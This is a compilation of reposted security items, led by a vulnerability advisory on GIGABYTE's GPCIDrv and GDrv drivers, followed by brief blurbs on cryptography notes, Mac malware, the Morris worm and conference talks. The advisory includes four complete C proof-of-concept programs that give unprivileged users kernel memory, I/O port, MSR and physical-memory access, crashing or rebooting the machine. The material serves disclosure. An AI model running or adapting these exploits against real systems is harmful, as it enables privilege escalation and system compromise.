Founded in 1986, GIGABYTE is committed to providing top-notch solutions that "upgraded your life". We are regarded as a pioneer in innovation with groundbreaking excitements such as Ultra Durable, WINDFORCE, and BRIX series. We have also invented a premium gaming brand AORUS, a full spectrum of gaming products for gamers and enthusiast. GIGABYTE has continuously brought unique new ways of digital world and created marvelous products that empower you with meaningful and charming experiences.

Multiple vulnerabilities were found in the GPCIDrv and GDrv drivers as bundled with several GIGABYTE and AORUS branded motherboard and graphics card utilities, which could allow a local attacker to elevate privileges.

4. Vulnerable Packages

GIGABYTE APP Center v1.05.21 and previous
AORUS GRAPHICS ENGINE v1.33 and previous
XTREME GAMING ENGINE v1.25 and previous
OC GURU II v2.08

Other products and versions might be affected, but they were not tested.

5. Vendor Information, Solutions and Workarounds

The vendor did not provide fixes or workaround information.

6. Credits

These vulnerabilities were discovered and researched by Diego Juarez. The publication of this advisory was coordinated by Leandro Cuozzo from the SecureAuth Advisories Team.

7. Technical Description / Proof of Concept Code

GIGABYTE App Center, RGBFusion, Xtreme Engine, AORUS Graphics Engine, etc. use low-level drivers to program and query the status of several embedded ICs on their hardware. Fan curves, clock frequencies, LED colors, thermal performance, and other user-customizable properties and monitoring functionality are exposed to applications through these low-level kernel drivers. The main subjects of this advisory are two of the device drivers installed/loaded by the affected GIGABYTE utilities (GPCIDrv and GDrv), from now on addressed as "GPCI" and "GIO". A default installation allows non-privileged user processes (even those running at LOW INTEGRITY) to get a HANDLE and issue IOCTL codes to these drivers. The following sections describe the problems found.

7.1. Arbitrary ring0 VM read/write [CVE-2018-19320]

There is ring0 memcpy-like functionality built into GIO's IOCTL 0xC3502808, allowing a local attacker to take complete control of the affected system.
Proof of Concept:

// GIGABYTE PoC demonstrating non-privileged R/W access to arbitrary virtual memory

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MEMCPY 0xC3502808

HANDLE ghDriver = 0;

#pragma pack (push,1)
typedef struct _GIO_MemCpyStruct {
    ULONG64 dest;
    ULONG64 src;
    DWORD size;
} GIO_MemCpyStruct;
#pragma pack(pop)

BOOL GIO_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
{
    GIO_MemCpyStruct mystructIn = { dest, src, size };
    BYTE outbuffer[0x30] = { 0 };
    DWORD returned = 0;
    DeviceIoControl(ghDriver, IOCTL_GIO_MEMCPY, (LPVOID)&mystructIn, sizeof(mystructIn),
                    (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
    if (returned) {
        return TRUE;
    }
    return FALSE;
}

BOOL InitDriver()
{
    char szDeviceNames[] = "\\\\.\\GIO";
    ghDriver = CreateFile(szDeviceNames, GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver \'%s\' - GetLastError:%d\n", szDeviceNames, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    if (!InitDriver()) {
        exit(0);
    }
    printf("GIGABYTE PoC (arbitrary ring0 write) - pnx!/CORE\n");
    printf("press ENTER for instant BSOD\n");
    getchar();
    ULONG64 data = 0xFFFF1111FFFF2222;
    GIO_memcpy(0, (ULONG64)&data, 8);
    CloseHandle(ghDriver);
    return 0;
}

7.2. Port mapped I/O access [CVE-2018-19322]

Both GPCI and GIO expose functionality to read/write data from/to IO ports. This could be leveraged in a number of ways to ultimately run code with elevated privileges.

Proof of Concept:

// GIGABYTE PoC demonstrating non-privileged access to IO ports
// This harmless PoC only reboots the PC; much more sinister stuff
// would also be possible by abusing this functionality.
#include <windows.h>
#include <stdio.h>

// for \\.\GPCIDrv64
#define IOCTL_GPCIDRV_PORTREADB  0x9C402588
#define IOCTL_GPCIDRV_PORTWRITEB 0x9C40258C
// for \\.\GIO
#define IOCTL_GIO_PORTREADB  0x0C3506404
#define IOCTL_GIO_PORTWRITEB 0x0C350A440

HANDLE ghDriver = 0;

typedef BYTE(*fnPMIOReadB)(WORD port);
typedef BYTE(*fnPMIOWriteB)(WORD port, BYTE value);

#pragma pack (push,1)
typedef struct {
    DWORD DriverIndex; // DriverEnum index
    BYTE DeviceName[MAX_PATH];
    fnPMIOReadB pPMIOReadB;
    fnPMIOWriteB pPMIOWriteB;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
    GPCIDrv64 = 1,
    GIO,
};

typedef struct _GPCIDRV_PORTIO_STRUCT {
    DWORD port;
    ULONG64 value;
} GPCIDRV_PORTIO_STRUCT;
#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
    BYTE outbuffer[0x30] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0]; \

BYTE GPCIDrv_PMIOReadB(WORD port)
{
    GPCIDRV_PORTIO_STRUCT inbuffer = { port, 0 };
    IOCTLMACRO(IOCTL_GPCIDRV_PORTREADB, 10)
}

BYTE GPCIDrv_PMIOWriteB(WORD port, BYTE value)
{
    GPCIDRV_PORTIO_STRUCT inbuffer = { port, value };
    IOCTLMACRO(IOCTL_GPCIDRV_PORTWRITEB, 10)
}

BYTE GIO_PMIOReadB(WORD port)
{
    GPCIDRV_PORTIO_STRUCT inbuffer = { port, 0 };
    IOCTLMACRO(IOCTL_GIO_PORTREADB, 4)
}

BYTE GIO_PMIOWriteB(WORD port, BYTE value)
{
    GPCIDRV_PORTIO_STRUCT inbuffer = { port, value };
    IOCTLMACRO(IOCTL_GIO_PORTWRITEB, 5)
}

void Reboot()
{
    BYTE cf9 = gConfig.pPMIOReadB(0xcf9) & ~0x6;
    gConfig.pPMIOWriteB(0xcf9, cf9 | 2);
    Sleep(50);
    gConfig.pPMIOWriteB(0xcf9, cf9 | 0xe);
    Sleep(50);
}

BOOL InitDriver()
{
    char *szDeviceNames[] = { "\\\\.\\GPCIDrv64", "\\\\.\\GIO" };
    BYTE i = 0;
    for (i = 0; i < 2; i++) {
        ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE,
                              FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                              FILE_ATTRIBUTE_NORMAL, NULL);
        if (ghDriver == INVALID_HANDLE_VALUE) {
            printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
            continue;
        }
        gConfig.DriverIndex = i + 1;
        memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
        break;
    }
    switch (gConfig.DriverIndex) {
    case DriverEnum::GPCIDrv64:
        gConfig.pPMIOReadB = (fnPMIOReadB)GPCIDrv_PMIOReadB;
        gConfig.pPMIOWriteB = (fnPMIOWriteB)GPCIDrv_PMIOWriteB;
        break;
    case DriverEnum::GIO:
        gConfig.pPMIOReadB = (fnPMIOReadB)GIO_PMIOReadB;
        gConfig.pPMIOWriteB = (fnPMIOWriteB)GIO_PMIOWriteB;
        break;
    default:
        break;
    }
    return gConfig.DriverIndex ? TRUE : FALSE;
}

int main(int argc, char* argv[])
{
    printf("GIGABYTE PoC (PMIO access) - pnx!/CORE\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    printf("DeviceName: \'%s\' Handle: %08x\n", gConfig.DeviceName, (DWORD)ghDriver);
    Reboot();
    return CloseHandle(ghDriver);
}

7.3. MSR Register access [CVE-2018-19323]

GIO exposes functionality to read and write Model Specific Registers (MSRs). This could be leveraged to execute arbitrary ring-0 code.

Proof of Concept:

// GIGABYTE GIO driver PoC demonstrating non-privileged access to MSR registers
// This PoC demonstrates non-privileged MSR access by reading the
// IA32_LSTAR value (leaks a kernel function pointer, bypassing KASLR)
// and then writing garbage to it (instant BSOD!)
#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MSRACCESS 0x0C3502580

HANDLE ghDriver = 0;

#pragma pack (push,1)
typedef struct _GIO_MSRIO_STRUCT {
    DWORD rw;      // 0 read - 1 write
    DWORD reg;     //
    ULONG64 value; //
} GIO_MSRIO_STRUCT;
#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode, size) \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[1]; \

ULONG64 GIO_RDMSR(DWORD reg)
{
    GIO_MSRIO_STRUCT inbuffer = { 1, reg };
    ULONG64 outbuffer[2] = { 0 };
    IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
{
    GIO_MSRIO_STRUCT inbuffer = { 0, reg, value };
    ULONG64 outbuffer[2] = { 0 };
    IOCTLMACRO(IOCTL_GIO_MSRACCESS, 16)
}

BOOL InitDriver()
{
    char szDeviceName[] = "\\\\.\\GIO";
    ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE,
                          FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL, NULL);
    if (ghDriver == INVALID_HANDLE_VALUE) {
        printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
        return FALSE;
    }
    return TRUE;
}

int main(int argc, char* argv[])
{
    printf("GIGABYTE PoC (MSR access) - pnx!/CORE\n");
    if (!InitDriver()) {
        printf("InitDriver failed! - aborting...\n");
        exit(0);
    }
    ULONG64 a = GIO_RDMSR(0xC0000082);
    printf("IA32_LSTAR: %llx (nt!KiSystemCall64)\n", a);
    printf("press ENTER for instant BSOD\n");
    getchar();
    a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
    return CloseHandle(ghDriver);
}

7.4. Arbitrary physical memory read/write [CVE-2018-19321]

Both GPCI and GIO expose functionality to read/write arbitrary physical memory, allowing a local attacker to take complete control of the affected system.
Proof of Concept:

// GIGABYTE PoC (arbitrary physical memory read/write)

#include <windows.h>
#include <stdio.h>

#define IOCTL_GIO_MAPPHYSICAL    0xC3502004
#define IOCTL_GIO_UNMAPPHYSICAL  0xC3502008
#define IOCTL_GPCI_MAPPHYSICAL   0x9C402580
#define IOCTL_GPCI_UNMAPPHYSICAL 0x9C402584

HANDLE ghDriver = 0;

typedef ULONG64(*fnMapPhysical)(ULONG64 physicaladdress);
typedef ULONG64(*fnUnMapPhysical)(ULONG64 address);

#pragma pack (push,1)
typedef struct _GIO_PHMAP {
    DWORD InterfaceType;
    DWORD Bus;
    ULONG64 PhysicalAddress;
    DWORD IOSpace;
    DWORD size;
} GIO_PHMAP;

typedef struct _GPCI_PHMAP {
    DWORD PhysicalAddress;
    DWORD size;
} GPCI_PHMAP;

typedef struct {
    DWORD DriverIndex; // DriverEnum index
    BYTE DeviceName[MAX_PATH];
    fnMapPhysical pMapPhysical;
    fnUnMapPhysical pUnMapPhysical;
} AutoConfigStruct;

AutoConfigStruct gConfig = { 0 };

enum DriverEnum {
    GPCIDrv64 = 1,
    GIO,
};
#pragma pack(pop)

#define IOCTLMACRO(iocontrolcode) \
    ULONG64 outbuffer[2] = { 0 }; \
    DWORD returned = 0; \
    DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, sizeof(inbuffer), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
    return outbuffer[0]; \

ULONG64 GIO_mapPhysical(ULONG64 physicaladdress)
{
    GIO_PHMAP inbuffer = { 0, 0, physicaladdress, 0, 0x1000 };
    IOCTLMACRO(IOCTL_GIO_MAPPHYSICAL)
}

ULONG64 GIO_unmapPhysical(ULONG64 address)
{
    ULONG64 inbuffer = address;
    IOCTLMACRO(IOCTL_GIO_UNMAPPHYSICAL)
}

ULONG64 GPCI_mapPhysical(DWORD physicaladdress)
{
    GPCI_PHMAP inbuffer = { physicaladdress, 0x1000 };
    IOCTLMACRO(IOCTL_GPCI_MAPPHYSICAL)
}

ULONG64 GPCI_unmapPhysical(ULONG64 address)
{
    ULONG64 inbuffer = address;
    IOCTLMACRO(IOCTL_GPCI_UNMAPPHYSICAL)
}

BOOL InitDriver()
{
    char *szDeviceNames[] = { "\\\\.\\GPCIDrv64", "\\\\.\\GIO" };
    BYTE i = 0;
    for (i = 0; i < 2; i++) {
        ghDriver = CreateFile(szDeviceNames[i], GENERIC_READ | GENERIC_WRITE,
                              FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING,
                              FILE_ATTRIBUTE_NORMAL, NULL);
        if (ghDriver == INVALID_HANDLE_VALUE) {
            printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceNames[i], GetLastError());
            continue;
        }
        gConfig.DriverIndex = i + 1;
        memcpy(gConfig.DeviceName, szDeviceNames[i], MAX_PATH - 1);
        break;
    }
    switch (gConfig.DriverIndex) {
    case DriverEnum::GPCIDrv64:
        gConfig.pMapPhysical = (fnMapPhysical)GPCI_mapPhysical;
        gConfig.pUnMapPhysical = (fnUnMapPhysical)GPCI_unmapPhysical;
        break;
    case DriverEnum::GIO:
        gConfig.pMapPhysical = (fnMapPhysical)GIO_mapPhysical;
        gConfig.pUnMapPhysical = (fnUnMapPhysical)GIO_unmapPhysical;
        break;
    default:
        break;
    }
    return gConfig.DriverIndex ? TRUE : FALSE;
}

int main(int argc, char *argv[])
{
    if (!InitDriver()) {
        exit(0);
    }
    printf("GIGABYTE PoC (arbitrary physical memory read/write) - pnx!/CORE\n");
    printf("press ENTER for System CRASH\n");
    getchar();
    printf("Bruteforcing");
    for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) {
        printf(".");
        ULONG64 mappedVA = gConfig.pMapPhysical(i);
        *(ULONG64 *)mappedVA = 0xCCCCCCCCCCCCCCCC;
        gConfig.pUnMapPhysical(mappedVA);
    }
    CloseHandle(ghDriver);
    return 0;
}

8. Report Timeline

2018-04-24: SecureAuth sent an initial notification to services@gigabyte and services@gigabyteusa and requested a security contact in order to send a draft advisory.
2018-04-26: SecureAuth sent the initial notification to sales@gigabyteusa and marketing@gigabyteusa and requested a security contact in order to send a draft advisory.
2018-04-30: Gigabyte's technical support team answered saying the notification was too general and requested SecureAuth to open a ticket in the support portal.
2018-05-02: SecureAuth replied that it is our policy to keep all communication via email in order to track all interactions. For that reason, SecureAuth notified Gigabyte again that a draft advisory, including a technical description, had been written and requested a security contact to send it to.
2018-05-04: Gigabyte's technical support team replied saying that Gigabyte is a hardware company, that they are not specialized in software, and requested technical information.
2018-05-04: In the absence of a security contact, SecureAuth sent the Gigabyte technical support team the draft advisory, including a technical description and PoCs.
2018-05-15: SecureAuth requested a status update.
2018-05-16: Gigabyte's technical support team answered that Gigabyte is a hardware company and they are not specialized in software. They requested technical details and tutorials to verify the vulnerabilities.
2018-05-16: SecureAuth requested a formal acknowledgment of the draft advisory sent.
2018-05-16: Gigabyte replied saying that the draft advisory was general and asked for a personal contact.
2018-05-17: SecureAuth notified Gigabyte again that it is our policy to keep all communication via email.
2018-05-31: SecureAuth requested a status update.
2018-05-16: Gigabyte replied saying that the draft advisory was general and asked for a phone contact again.
2018-05-31: SecureAuth requested a formal acknowledgment of the draft advisory sent multiple times, in order to engage in a coordinated vulnerability disclosure process.
2018-07-03: SecureAuth requested a status update.
2018-07-12: Gigabyte responded that, according to its PM and engineers, its products are not affected by the reported vulnerabilities.
2018-12-18: Advisory CORE-2018-0007 published as 'user release'.

9. References

[1] https://www.gigabyte.com/About

10. About SecureAuth Labs

SecureAuth Labs, the research arm of SecureAuth Corporation, is charged with anticipating the future needs and requirements for information security technologies. We conduct research in several important areas of computer security, including identity-related attacks, system vulnerabilities and cyber-attack planning.
Research includes problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. We regularly publish security advisories, primary research, technical publications, research blogs, project information, and shared software tools for public use at http://www.secureauth.com/

11. About SecureAuth

SecureAuth is leveraged by leading companies, their employees, their customers and their partners to eliminate identity-related breaches. As a leader in access management, identity governance, and penetration testing, SecureAuth is powering an identity security revolution by enabling people and devices to intelligently and adaptively access systems and data, while effectively keeping bad actors from doing harm. By ensuring the continuous assessment of risk and enablement of trust, SecureAuth's highly flexible Identity Security Automation (ISA) platform makes it easier for organizations to prevent the misuse of credentials and exponentially reduce the enterprise threat surface. To learn more, visit www.secureauth.com, call (949) 777-6959, or email us at info@secureauth.com

12. Disclaimer

The contents of this advisory are copyright (c) 2018 SecureAuth, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Sursa: https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
-
An Intensive Introduction to Cryptography
Boaz Barak
Work in progress

These are lecture notes for an introductory but fast-paced undergraduate/beginning graduate course on cryptography. I am using these notes for Harvard CS 127. You can also download all lecture notes in a single PDF file. If you have any comments, suggestions, typo fixes, etc., I would be very grateful if you post them as an issue or pull request in the GitHub repository where I am maintaining the source files for these notes.

Lectures

0 Preface (pdf version)
0.5 Mathematical background (pdf version)
1 Introduction (pdf version)
2 Computational security (pdf version)
3 Pseudorandom generators (pdf version)
4 Pseudorandom functions (pdf version)
5 Pseudorandom functions from pseudorandom generators (pdf version)
6 Chosen ciphertext security (pdf version)
7 Hash functions, proofs of work and cryptocurrencies (pdf version)
8 More hash functions (pdf version)
9 Public key cryptography (pdf version)
10 Concrete public key schemes (pdf version)
11 Lattice based cryptography (pdf version)
12 Chosen Ciphertext Security for Public Key Encryption (pdf version)
13 Establishing secure communication channels (pdf version)
14 Zero knowledge proofs (pdf version)
15 Fully homomorphic encryption (pdf version)
16 Fully homomorphic encryption II (pdf version)
17 Multiparty secure computation (pdf version)
18 Multiparty secure computation II (pdf version)
19 Quantum computing and cryptography (pdf version)
20 Quantum computing and cryptography II (pdf version)
21 Software obfuscation (pdf version)
22 Software obfuscation II (pdf version)
23 Anonymous routing (pdf version)
24 Cryptography morality and policy (pdf version)
25 Course recap (pdf version)

Sursa: https://intensecrypto.org/public/index.html
-
Report: The Mac Malware of 2018

Aloha Patrons!

Over the last few weeks, I've been diligently working on my annual "Mac Malware of the Year" report. It's been a rather encyclopedic effort, as it includes an in-depth overview of all new Mac malware (and adware) of 2018. But hooray - it's now complete!

For each specimen the report details the malware's:

infection vector
persistence mechanism
payload and capabilities

...oh, and you can also download each and every specimen to play with! Just don't infect yourself!

Read: "The Mac Malware of 2018"

PDF format ( https://objective-see.com/downloads/MacMalware_2018.pdf )
Blog format ( https://objective-see.com/blog/blog_0x3C.html )

Enjoy! And mahalo for your continuing 2019 support! ♥️

-patrick

Sursa: https://www.patreon.com/posts/23697586
-
This blog is the 10th post in our annual 12 Days of HaXmas series.

A couple of months ago, we paid tribute to the 30th anniversary of the Morris worm by dropping three new modules for it:

A buffer overflow in fingerd(8)
A VAX reverse shell
A command injection in Sendmail's debug code

All of these vulnerabilities were exploited by the worm in 1988. In this post, we will dive into the exploit development process for those modules, beginning our journey by building a 4.3BSD system for testing, and completing it by retracing the worm author's steps to RCE. By the end of this post, it will hopefully become clear how even 30-year-old vulns can still teach us modern-day fundamentals.

Background

Let's start with a little history on how this strange project came to be. I recall reading about the Morris worm on VX Heaven. It was many years ago, and some of you may still remember that site. Fast-forward to 2018, and I had forgotten about the worm until I had the opportunity to finish Cliff Stoll's hacker-tracker epic, "The Cuckoo's Egg." In the epilogue, Stoll recounts fighting the first internet worm. Notably, the worm exercised what was arguably the first malicious buffer overflow in the wild. It also exploited a command injection in Sendmail's debug mode, which was normally used by administrators to debug mail problems. And even beyond the technical, the worm resulted in what was the first conviction under the Computer Fraud and Abuse Act (CFAA), a precedent with lasting effects today.

Feeling inspired, I began a side project to see whether I could replicate the worm's exploits using period tools. But first, I needed a system.

Articol complet: https://blog.rapid7.com/2019/01/02/the-ghost-of-exploits-past-a-deep-dive-into-the-morris-worm/
-
This talk aims to give a general overview of iOS jailbreaking by starting at what jailbreaking was back in the day and how it evolved up until today, while also taking a quick look at how it might evolve in the future. The following topics are covered:

- Jailbreaking goals (technical)
- Types of jailbreak and their origins (tethered, untethered, semi-tethered, semi-untethered)
- Exploit mitigations (ASLR, iBoot-level AES, KPP, KTRR, PAC)
- Kernel patches (h3lix)
- Kppless jailbreaks

The goal is to give an insight into jailbreak terminology, exploit mitigations, and how these are dealt with in past and modern jailbreaks. I will give an introduction to jailbreak terminology and walk through jailbreak history, presenting how iOS devices have been hacked/jailbroken in the past while focusing on what mitigations Apple added over the years. I will then discuss what effects these mitigations have on jailbreaking and how they were (and still are) dealt with. This should be interesting for hackers new to the iOS game, as several technical aspects are covered, but also for people who jailbreak their devices and want to get a better understanding of what is happening under the hood of jailbreaks, as well as what challenges hackers have to face and why things evolved the way they are right now. This talk is structured somewhat similarly to my previous talk two years ago, "iOS Downgrading - From past to present". Watching my previous talk is not necessary for understanding this one, but is suggested to get a better overall image of iOS hacking.
-
We all know what FAX is, and for some strange reason most of us need to use it from time to time. Hard to believe it's 2018, right? But can FAX be something more than a bureaucratic burden? Can it actually be a catastrophic security hole that may be used to compromise your entire network? Come watch our talk and find out … Unless you've been living under a rock for the past 30 years or so, you probably know what a fax machine is. For decades, fax machines were used worldwide as the main way of electronic document delivery. But this happened in the 1980s. Humanity has since developed far more advanced ways to send digital content, and fax machines are all in the past, right? After all, they should now be nothing more than a glorified museum item. Who on earth is still using fax machines? The answer, to our great horror, is EVERYONE. State authorities, banks, service providers and many others are still using fax machines, despite their debatable quality and almost non-existent security. In fact, using fax machines is often mandatory and considered a solid and trustworthy method of delivering information. What the Fax?! We embarked on a journey with the singular goal of disrupting this insane state of affairs. We went to work, determined to show that the common fax machine could be compromised via mere access to its fully exposed and unprotected telephone line – thus completely bypassing all perimeter security protections and shattering to pieces all modern-day security concepts. Join us as we take you through the strange world of embedded operating systems, 30-year-old protocols, museum-grade compression algorithms, weird extensions and undebuggable environments. See for yourself first-hand as we give a live demonstration of the first ever full fax exploitation, leading to complete control over the entire device as well as the network, using nothing but a standard telephone line. This talk is intended to be the canary in the coal mine. 
The technology community cannot sit idly by while this ongoing madness is allowed to continue! The world must stop using FAX!
-
-
-
In this talk, we’re looking at third party tracking on Android. We’ve captured and decrypted data in transit between our own devices and Facebook servers. It turns out that some apps routinely send Facebook information about your device and usage patterns - the second the app is opened. We’ll walk you through the technical part of our analysis and end with a call to action: We believe that both Facebook and developers can do more to avoid oversharing, profiling and damaging the privacy of their users.
-
The pursuit of a “good customer experience” not only brings in new customers, but also attracts criminals of all sorts. This presentation will give an overview of the current security situation of ATMs with the various auxiliary devices that allow cardless transactions. Cardless is the new sexy for criminals. The era of ATMs started in London in 1967. Since the days when the “hole-in-the-wall” cash machine used radiocarbon paper cheques, ATMs have become more complex and smart, providing the opportunity to withdraw money without cards. Vendors, in response to bank and consumer demand, create ATMs that replace plastic cards and PINs with smartphones or QR codes. Cash withdrawal from an ATM is now easier than ever before, not only for clients but also for attackers. Jackpotting an ATM via malware or a black box is already familiar. Countermeasures against such attacks are in place in many banks. Thus, attackers need to discover new (or well-forgotten) ways to achieve their evil goals. We will not chew the fat telling stories about the old days, because new functionality provides new possibilities. Migration from Windows XP to Windows 7/10 means there is always PowerShell on the ATM. “New” types of input devices allow BadBarcode-like attacks. A legitimate auxiliary device connected to the ATM in pursuit of the so-called good customer experience may lead to the ejection of all money from the ATM.
-
This talk will teach you the fundamentals of machine learning and give you a sneak peek into the internals of the mystical black box. You'll see how crazy powerful neural networks can be and understand why they sometimes fail horribly. Computers that are able to learn on their own. It might have sounded like science fiction just a decade ago, but we're getting closer and closer with recent advancements in deep learning. Or are we? In this talk, I'll explain the fundamentals of machine learning in an understandable and entertaining way. I'll also introduce the basic concepts of deep learning. With the current hype around deep learning and giant tech companies spending billions on research, understanding how those methods work and knowing their challenges and limitations is key to seeing the facts behind the often exaggerated headlines. One of the most common applications of deep learning is the interpretation of images, a field that has been transformed significantly in recent years. Applying neural networks to image data helps visualise and understand many of the faults as well as advantages of machine learning in general. As a research scientist in the field of automated analysis of bio-medical image data, I can give you some insights into these as well as some real-world applications.
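To make those fundamentals concrete, here is a toy sketch (my own illustration, not material from the talk): a tiny neural network trained with plain NumPy on XOR, the textbook problem that no single linear layer can solve. All layer sizes and hyperparameters are arbitrary demo choices.

```python
import numpy as np

# Toy backpropagation demo: learn XOR with one hidden layer.
rng = np.random.default_rng(0)

X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=float)
y = np.array([[0], [1], [1], [0]], dtype=float)

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

# Random init breaks symmetry; 4 hidden units can bend the decision boundary.
W1, b1 = rng.normal(size=(2, 4)), np.zeros((1, 4))
W2, b2 = rng.normal(size=(4, 1)), np.zeros((1, 1))

def forward(X):
    h = sigmoid(X @ W1 + b1)
    return h, sigmoid(h @ W2 + b2)

initial_loss = np.mean((forward(X)[1] - y) ** 2)

lr = 1.0
for _ in range(10000):
    h, out = forward(X)
    # Backpropagate the squared-error gradient through both layers
    d_out = (out - y) * out * (1 - out)
    d_h = (d_out @ W2.T) * h * (1 - h)
    W2 -= lr * (h.T @ d_out)
    b2 -= lr * d_out.sum(axis=0, keepdims=True)
    W1 -= lr * (X.T @ d_h)
    b1 -= lr * d_h.sum(axis=0, keepdims=True)

final_loss = np.mean((forward(X)[1] - y) ** 2)
predictions = (forward(X)[1] > 0.5).astype(int).ravel()
print("loss:", initial_loss, "->", final_loss)
print("XOR predictions:", predictions)
```

Re-run it with a different seed and it may converge to a different (or worse) solution, which is a small taste of the "sometimes fails horribly" part.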
-
A few months ago we got a new version of TLS, the most important encryption protocol on the Internet. From the vulnerabilities that created the need for a new TLS version to the challenges of deploying it due to broken devices, this talk will give an overview of the new TLS 1.3. In August the new version 1.3 of the Transport Layer Security (TLS) protocol was released. It‘s the result of a process that started over four years ago, when it became increasingly clear that previous TLS versions suffered from some major weaknesses. In many ways TLS 1.3 is the biggest step ever taken in the history of TLS and its predecessor SSL. While previous TLS versions always tried to retain compatibility and not change too many things, the new version radically removes problematic and insecure constructions like static RSA key exchanges, fragile CBC/HMAC constructions and broken hash functions like MD5 and SHA1. As a bonus, TLS 1.3 comes with a reworked handshake that reduces the number of round trips and thus provides not just more security, but also better performance. If that sounds too good to be true: an optional, even faster mode of TLS 1.3 – the zero round trip or 0-RTT mode – makes some security researchers worried, because they fear it introduces new security risks due to replay attacks. The road to TLS 1.3 was complicated, though. The Internet is a buggy place, and Enterprise devices of all kinds – middleboxes, TLS-terminating servers and TLS-interception devices – slowed down the deployment and finalization of the new encryption protocol. Some banks even thought that TLS 1.3 is too secure for them. The talk will give an overview of the developments that led to TLS 1.3, the major changes it brings, the challenges it had to face, and some practical advice for deployment.
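As a small practical aside (not part of the talk abstract): with Python 3.7+ and an OpenSSL 1.1.1+ build, you can experiment with TLS 1.3 directly from the standard library's ssl module, for instance by building a client context that refuses anything older than TLS 1.3:

```python
import ssl

def tls13_only_context() -> ssl.SSLContext:
    """Build a client-side context that refuses anything older than TLS 1.3."""
    ctx = ssl.create_default_context()
    # TLSVersion.TLSv1_3 exists in Python 3.7+; a successful handshake
    # additionally requires the linked OpenSSL to be 1.1.1 or newer.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3
    return ctx

if __name__ == "__main__":
    ctx = tls13_only_context()
    print("TLS 1.3 supported by this OpenSSL build:", ssl.HAS_TLSv1_3)
    # Use it like any context, e.g. (network code shown only as a comment):
    #   with socket.create_connection(("example.org", 443)) as s:
    #       with ctx.wrap_socket(s, server_hostname="example.org") as tls:
    #           print(tls.version())  # "TLSv1.3" if negotiation succeeded
```

Pointing such a context at a server that only speaks TLS 1.2 or older fails the handshake, which makes it a handy probe for exactly the kind of broken middleboxes the talk mentions.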
-
Often, when doing reverse engineering projects, one needs to import symbols from open-source or «leaked» code bases into IDA databases. What everybody does is compile to binary, diff and import the matches. However, this is often problematic due to compiler optimizations, the flags used, etc… It can even be impossible, because old source code does not compile with newer compilers or, simply, because there is no full source, just partial source code. During the talk, I will discuss algorithms for importing symbols *directly* from C source code into IDA databases and release a tool (that will run, most likely, on top of Diaphora) for doing so.
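The core idea, matching features extracted from un-compiled source functions against features recovered from binary functions, can be sketched in a few lines of Python. To be clear, this is my own simplified illustration, not the speaker's actual algorithm: the demo data and names (`sub_401000`, etc.) are invented, the regex "parser" is a toy, and a real tool uses a proper C parser and far richer heuristics.

```python
import re

def source_features(c_code):
    """Per-function features from C source: callee names and string literals.
    Toy regex "parser"; a real tool would use an actual C parser."""
    feats = {}
    for m in re.finditer(r"\b(\w+)\s*\([^;{)]*\)\s*\{", c_code):
        name = m.group(1)
        body = c_code[m.end():c_code.find("}", m.end())]
        calls = set(re.findall(r"\b(\w+)\s*\(", body))
        strings = set(re.findall(r'"([^"]*)"', body))
        feats[name] = (calls, strings)
    return feats

def match(src_feats, bin_feats):
    """Greedy best match: score = shared callees + shared string literals."""
    result = {}
    for bin_name, (bcalls, bstrs) in bin_feats.items():
        best, best_score = None, 0
        for src_name, (scalls, sstrs) in src_feats.items():
            score = len(bcalls & scalls) + len(bstrs & sstrs)
            if score > best_score:
                best, best_score = src_name, score
        if best is not None:
            result[bin_name] = best
    return result

# Demo with invented data: one "unknown" binary function whose imported
# callees and string references were recovered by the disassembler.
code = '''
int log_error(const char *msg) { fprintf(stderr, "error: %s", msg); return 1; }
int add(int a, int b) { return a + b; }
'''
bin_feats = {"sub_401000": ({"fprintf"}, {"error: %s"})}
print(match(source_features(code), bin_feats))  # {'sub_401000': 'log_error'}
```

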